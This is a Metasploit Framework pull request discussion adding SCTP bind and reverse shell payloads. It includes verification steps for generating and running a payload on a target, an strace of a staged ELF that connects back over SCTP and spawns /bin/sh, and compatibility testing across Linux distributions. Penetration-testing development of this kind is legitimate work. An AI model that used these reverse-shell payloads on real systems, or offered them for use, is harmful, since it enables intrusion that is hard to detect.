metasploit-framework
SCTP Sessions
With the introduction of SCTP socket support in Rex::Socket via https://github.com/rapid7/rex-socket/pull/56, Framework can utilize this protocol for session transports similarly to TCP as it is a stream-wise transport. Implement bind and reverse handlers for the new socket type. Implement example bind and reverse payloads using socat copying from the initial udp sessions implementation.
Testing: Rudimentary bind session test against local Libvirt Linux VM
Next steps: Implement the language-level payloads for the interpreters common to POSIX environments supporting SCTP. Implement meterpreter transports for SCTP in Python, PHP, Mettle, and Java modalities (Windows doesn't support it without carrying its own usermode protocol library).
Verification
- [ ] Start `msfconsole`
- [ ] `use payload/cmd/unix/bind_socat_sctp`
- [ ] set RHOST to the machine on which you are running `socat`
- [ ] generate payload
- [ ] run payload on target (may need sudo to auto-load kmod)
- [ ] `to_handler` to initiate bind to the `socat` SCTP listener
- [ ] Verify interactive session
I have no idea how @h00die's commit is attached to this all of a sudden - digging.
I'm in your system, adding commits to your branch :)
Are you in my system, or is my system around you? :wink:
After a bit of mucking about, it seems that some versions of `netstat` do see the socket, but `ss` seems to ignore it with the same flags on Arch Linux (rolling distro with generally current bins):

```
$ ss -an|grep sctp
$ netstat -an|grep sctp
sctp       0   1024 192.168.121.251:4444    192.168.121.1:39933     ESTABLISHED
$ ^Z
Background session 1? [y/N]  y
(2023-01-18)20:28 (S:1 J:2)msf payload(cmd/unix/bind_socat_sctp) > sessions

Active sessions
===============

  Id  Name  Type      Information                                                                       Connection
  --  ----  ----      -----------                                                                       ----------
  1   shell cmd/unix  Shell Banner: bash: cannot set terminal process group (1205): Inappropriate ...   192.168.121.1:39933 -> 192.168.121.251:4444 (192.168.121.251)
```
Looks like I managed to get binary reverse-staging working on Linux (x64):

```
$ strace /tmp/pay.elf
execve("/tmp/pay.elf", ["/tmp/pay.elf"], 0x7ffefd202f00 /* 21 vars */) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0x7febc753f000
socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.121.1")}, 16) = 0
read(3, "j\3^H\377\316j!X\17\5u\366j;X\231H\273/bin/sh\0SH\211\347R"..., 38) = 38
dup2(3, 2)                              = 2
dup2(3, 1)                              = 1
dup2(3, 0)                              = 0
execve("/bin/sh", ["/bin/sh"], NULL)    = 0
brk(NULL)                               = 0x55be7ea63f80
arch_prctl(0x3001 /* ARCH_??? */, 0x7ffec7ac0bd0) = -1 EINVAL (Invalid argument)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fbded10f000
```
Adding delayed tag until https://github.com/rapid7/rex-socket/pull/56 gets landed.
@gwillcox-r7 - ping to un-tag as delayed please. Got another new session type queued up last night, hoping to get these landed quickly as they're pretty straightforward other than platform targeting.
@sempervictus Thanks for the ping, I see the respective PR is landed, unmarking as delayed now
Linting needs to be fixed; but this can be rebased on master now to pull in the rex-socket changes from https://github.com/rapid7/rex-socket/pull/56
Verified `linux/x64/shell/reverse_sctp` worked fine when testing against Kali.

Was not able to get a shell on either Fedora 21 or 37. Ran `strace` and it seems they don't support the protocol. Identical output on both machines.
I'm going to be off next week as I'm moving house. I'll un-assign myself for now and I'm happy for someone else to pick this up in the meantime if they want, or I can pick it up again once I'm back.
@cgranleese-r7 (or whomever is testing Fedora), what does `modinfo sctp` kick back for output? I'm wondering if Fedora might not build the module at all, or have something akin to MODHARDEN preventing auto-loading of the module by non-privileged users. On our systems, I'm seeing:

```
description:    Support for the SCTP protocol (RFC2960)
author:         Linux Kernel SCTP developers <[email protected]>
alias:          net-pf-10-proto-132
alias:          net-pf-2-proto-132
srcversion:     18046A8AB1857CD7617BE33
depends:        ip6_udp_tunnel,udp_tunnel,libcrc32c
```
Ran `modinfo sctp` against Fedora 37 & 21 as well as Kali for comparison.
Fedora 37 output

```
[foo@fedora ~]$ modinfo sctp
filename:       /lib/modules/6.0.7-301.fc37.x86_64/kernel/net/sctp/sctp.ko.xz
license:        GPL
description:    Support for the SCTP protocol (RFC2960)
author:         Linux Kernel SCTP developers <[email protected]>
alias:          net-pf-10-proto-132
alias:          net-pf-2-proto-132
depends:        udp_tunnel,ip6_udp_tunnel
retpoline:      Y
intree:         Y
name:           sctp
vermagic:       6.0.7-301.fc37.x86_64 SMP preempt mod_unload
sig_id:         PKCS#7
signer:         Fedora kernel signing key
sig_key:        36:D6:5C:AB:1C:52:F5:1C:CB:D6:B6:59:D6:37:B8:BA:EC:90:78:4F
sig_hashalgo:   sha256
parm:           no_checksums:Disable checksums computing and verification (bool)
```
Fedora 21

```
[foo@localhost ~]$ modinfo sctp
modinfo: ERROR: Module sctp not found.
```
Kali

```
┌──(kali㉿kali)-[/mnt/metasploit-framework]
└─$ modinfo sctp
filename:       /lib/modules/5.18.0-kali5-amd64/kernel/net/sctp/sctp.ko
license:        GPL
description:    Support for the SCTP protocol (RFC2960)
author:         Linux Kernel SCTP developers <[email protected]>
alias:          net-pf-10-proto-132
alias:          net-pf-2-proto-132
depends:        udp_tunnel,libcrc32c,ip6_udp_tunnel
retpoline:      Y
intree:         Y
name:           sctp
vermagic:       5.18.0-kali5-amd64 SMP preempt mod_unload modversions
parm:           no_checksums:Disable checksums computing and verification (bool)
```
I guess that's the beauty of Linux - we all build what we want. Rhel7 does apparently support it:

```
# cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.9 (Maipo)
# modinfo sctp
filename:       /lib/modules/3.10.0-1160.el7.x86_64/kernel/net/sctp/sctp.ko.xz
license:        GPL
description:    Support for the SCTP protocol (RFC2960)
author:         Linux Kernel SCTP developers <[email protected]>
alias:          net-pf-10-proto-132
alias:          net-pf-2-proto-132
retpoline:      Y
rhelversion:    7.9
srcversion:     2ACA667B4EEDFCDBE7C9C3C
depends:        libcrc32c
intree:         Y
vermagic:       3.10.0-1160.el7.x86_64 SMP mod_unload modversions
signer:         Red Hat Enterprise Linux kernel signing key
sig_key:        F5:8B:27:1A:CB:D9:E0:E0:CE:5F:C2:D6:F0:81:AA:04:2C:E7:0F:75
sig_hashalgo:   sha256
parm:           no_checksums:Disable checksums computing and verification (bool)
```
- `cmd/unix/bind_socat_sctp`: Tested against Kali Linux and everything worked as expected.
- `linux/x64/shell/reverse_sctp`: Tested against Kali Linux and everything worked as expected.
- `cmd/windows/python/shell_reverse_sctp`: Tested against Windows 10 and it seems it does not support SCTP.
- `cmd/unix/reverse_socat_sctp`: Tested against Kali Linux and everything worked as expected.

Note

Fedora also currently appears to not support SCTP; this was discussed in an above comment but I thought I'd add it here for future travelers.
@cgranleese-r7 how did you do that on Windows? Windows doesn't do SCTP :grin:. Is py bringing its own SCTP impl atop UDP or something?
@sempervictus That's my fault, I copy pasted the wrong results across. I had used the wrong workflow from my notes.
Will update the results for that module once I'm on for the day. Sorry about any confusion that caused.
No worries boss, got me hoping there for a sec :).
I'm just trying to get a RHEL environment set up to run some additional tests against these modules. If you could get the `Lint / Lint msftidy (2.7) (pull_request)` tests passing, I could then land this once I have all my testing completed.
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be run from the root directory of Metasploit:

```
rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>
```

You can automate most of these changes with the `-a` flag:

```
rubocop -a <directory or file>
```

Please update your branch after these have been made, and reach out if you have any problems.
RHEL 8.1

Tested `linux/x64/shell/reverse_sctp` against RHEL 8.1 and it seems it also doesn't support SCTP:
`modinfo sctp` output:
> I guess that's the beauty of Linux - we all build what we want. Rhel7 does apparently support it:
If you'd like, I can try and get a RHEL 7 environment setup and test it there as your output above showed it supports SCTP.
This sounds like a matrix job for buildbots:

- check if `sctp` is compiled (is there a module, is it builtin?).
- check if unprivileged auto-load of `sctp` works on the target (even if built, but either blacklisted or auto-load-disabled, it'll be prevented from working)
- create an SCTP socketpair, write "test\n" into one side, verify reading "test\n" out of the other. (should help test BSDs too since the first two don't work the same there)

Output of that should roughly give us our compatible targets list.
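The three checks above as a standalone Ruby probe, added here as an example; it is not code from this PR or from Framework, and the `SctpProbe` module, its method names and the protocol number constant are my own. It assumes Linux paths (`/proc/modules`, `/proc/net/sctp`, `/lib/modules`) for the first check, and the loopback round-trip is parameterised by protocol so TCP can serve as a control on hosts without SCTP.

```ruby
require 'socket'

# Hypothetical probe (not part of the PR): mirrors the three buildbot checks.
module SctpProbe
  IPPROTO_SCTP = 132 # IANA protocol number; same value as Socket::IPPROTO_SCTP on Linux

  # Check 1: is sctp loaded or built in (/proc/net/sctp exists), loaded as a
  # module (/proc/modules), or at least present on disk for the running kernel?
  def self.module_status
    return :loaded if File.exist?('/proc/net/sctp')
    return :loaded if File.exist?('/proc/modules') &&
                      File.readlines('/proc/modules').any? { |l| l.start_with?('sctp ') }
    release = File.exist?('/proc/sys/kernel/osrelease') ? File.read('/proc/sys/kernel/osrelease').strip : ''
    return :on_disk if Dir.glob("/lib/modules/#{release}/kernel/net/sctp/sctp.ko*").any?
    :missing
  end

  # Check 2: can an unprivileged process open an SCTP socket? On Linux the
  # socket() call is what triggers auto-load via the net-pf-2-proto-132 alias,
  # so a blacklisted or autoload-disabled module surfaces here as an errno.
  def self.socket_status
    Socket.new(Socket::AF_INET, Socket::SOCK_STREAM, IPPROTO_SCTP).close
    :ok
  rescue Errno::EPROTONOSUPPORT, Errno::ESOCKTNOSUPPORT, Errno::EAFNOSUPPORT, Errno::EINVAL
    :unsupported
  end

  # Check 3: loopback round-trip of "test\n" over a one-to-one stream socket.
  def self.echo_test(proto = IPPROTO_SCTP, payload = "test\n")
    srv = Socket.new(Socket::AF_INET, Socket::SOCK_STREAM, proto)
    srv.bind(Socket.sockaddr_in(0, '127.0.0.1'))
    srv.listen(1)
    cli = Socket.new(Socket::AF_INET, Socket::SOCK_STREAM, proto)
    cli.connect(Socket.sockaddr_in(srv.local_address.ip_port, '127.0.0.1'))
    cli.write(payload)
    conn, _addr = srv.accept
    conn.read(payload.bytesize) == payload ? :ok : :mismatch
  rescue SystemCallError
    :failed
  ensure
    [srv, cli, conn].compact.each { |s| s.close unless s.closed? }
  end

  # One row of the compatibility matrix for this host.
  def self.run
    socket = socket_status
    { module: module_status, socket: socket, echo: socket == :ok ? echo_test : :skipped }
  end

  def self.supported?
    run[:echo] == :ok
  end
end

puts SctpProbe.run.map { |k, v| "#{k}=#{v}" }.join(' ') if $PROGRAM_NAME == __FILE__
```

A host is only a usable target for these payloads when all three fields come back clean; `module=on_disk socket=unsupported` is the blacklisted/no-autoload case the second bullet describes.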
I'd like to be able to believe that this will get wider use than it will, but UDP payloads showed that even with something so accessible as the most common "other" L4 transport, fewer young minds tend to think outside the box at lower layers of the stack and even reach for tooling of that kind. I don't think adding this to framework will move the needle on the volume of SCTP which global NIDS nets will detect along their observed wires; but I do think it'll be "that last key function" someone needs now and again in a tough situation which they'll at least have available through this work.
I'm happy to merge this for now and I can put up a separate PR to fix the linting. If you're happy enough with that?
> I'm happy to merge this for now and I can put up a separate PR to fix the linting
That sounds like a good way to get this out the door, let's go ahead and get this shipped 📈
Thanks folks, much appreciate the integration effort. Aside from raw IP sockets, are there any major OSI3 or OSI4 types remaining, or are we down to higher-layer types now?
Release Notes
This PR adds SCTP sessions which Metasploit Framework can utilize for session transports similarly to TCP as it is a stream-wise transport.
Thank you, now let's see how long it takes the blue side vendors to start reporting (increased) SCTP use in the wild :smile: